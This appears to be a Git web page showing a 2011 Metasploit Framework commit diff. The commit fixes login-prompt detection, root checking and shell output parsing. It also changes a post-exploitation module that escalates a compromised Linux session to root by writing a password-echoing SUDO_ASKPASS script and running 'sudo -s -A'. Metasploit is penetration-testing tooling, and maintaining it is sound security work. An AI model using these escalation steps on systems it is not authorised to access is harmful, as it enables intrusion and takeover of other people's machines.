infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Always try both export and setenv. Fixups to allow for correct reading from echoy nix shells. Fixes is_root? to not treat an empty string as 0

unstable
Tod Beardsley 2011-11-16 16:48:19 -06:00
parent 725431dbdb
commit 93a133d5de
4 changed files with 32 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/msf/core/auxiliary/login.rb
View File

@ -130,7 +130,7 @@ module Auxiliary::Login
end end
def password_prompt? def password_prompt?
return true if @recvd =~ @password_regex return true if(@recvd =~ @password_regex or @recvd =~ /#{datastore['USERNAME']}'s/)
return false return false
end end

6
lib/msf/core/post/linux/priv.rb
View File

@ -10,10 +10,12 @@ module Priv
def is_root? def is_root?
root_priv = false root_priv = false
user_id = cmd_exec("id -u") user_id = cmd_exec("id -u")
if user_id.to_i == 0 if user_id and !user_id.empty?
if user_id.strip.lstrip.to_i == 0
root_priv = true root_priv = true
elsif user_id =~ /^\d*$/ elsif user_id.to_s =~ /^\d*$/
root_priv = false root_priv = false
end
else else
raise "Could not determine UID: #{user_id}" raise "Could not determine UID: #{user_id}"
end end

19
lib/msf/core/session/provider/single_command_shell.rb
View File

@ -91,12 +91,27 @@ module SingleCommandShell
def shell_command_token_unix(cmd, timeout=10) def shell_command_token_unix(cmd, timeout=10)
# read any pending data # read any pending data
buf = shell_read(-1, 0.01) buf = shell_read(-1, 0.01)
set_shell_token_index(timeout)
token = ::Rex::Text.rand_text_alpha(32) token = ::Rex::Text.rand_text_alpha(32)
# Send the command to the session's stdin. # Send the command to the session's stdin.
# NOTE: if the session echoes input we don't need to echo the token twice.
shell_write(cmd + ";echo #{token}\n") shell_write(cmd + ";echo #{token}\n")
shell_read_until_token(token, 0, timeout) shell_read_until_token(token, @shell_token_index, timeout)
end
# NOTE: if the session echoes input we don't need to echo the token twice.
def set_shell_token_index(timeout)
return @shell_token_index if @shell_token_index
token = ::Rex::Text.rand_text_alpha(32)
numeric_token = rand(0xffffffff) + 1
cmd = "echo #{numeric_token}"
shell_write(cmd + ";echo #{token}\n")
res = shell_read_until_token(token, 0, timeout)
if res.to_i == numeric_token
@shell_token_index = 0
else
@shell_token_index = 1
end
end end
# #

6
modules/post/linux/manage/sudo.rb
View File

@ -48,6 +48,7 @@ class Metasploit3 < Msf::Post
def run def run
print_status("SUDO: Attempting to upgrade to UID 0 via sudo") print_status("SUDO: Attempting to upgrade to UID 0 via sudo")
sudo_bin = cmd_exec("which sudo") sudo_bin = cmd_exec("which sudo")
my_id = cmd_exec("id -u")
if is_root? if is_root?
print_status "Already root, so no need to upgrade permissions. Aborting." print_status "Already root, so no need to upgrade permissions. Aborting."
return return
@ -98,10 +99,9 @@ class Metasploit3 < Msf::Post
cmd_exec("echo echo #{password} >> #{askpass_sh}") cmd_exec("echo echo #{password} >> #{askpass_sh}")
cmd_exec("chmod +x #{askpass_sh}") cmd_exec("chmod +x #{askpass_sh}")
vprint_status "Setting environment variable." vprint_status "Setting environment variable."
# Bruteforce-set the environment variable? is cmd_exec() always # Bruteforce-set the environment variable with both setenv and export.
# going to be in the context of /bin/sh ?
askpass_env = cmd_exec("setenv SUDO_ASKPASS #{askpass_sh}") askpass_env = cmd_exec("setenv SUDO_ASKPASS #{askpass_sh}")
cmd_exec("export SUDO_ASKPASS=#{askpass_sh}") if askpass_env.to_s.empty? cmd_exec("export SUDO_ASKPASS=#{askpass_sh}")
vprint_status "Executing sudo -s -A" vprint_status "Executing sudo -s -A"
cmd_exec("sudo -s -A") cmd_exec("sudo -s -A")
vprint_status "Deleting the askpass script." vprint_status "Deleting the askpass script."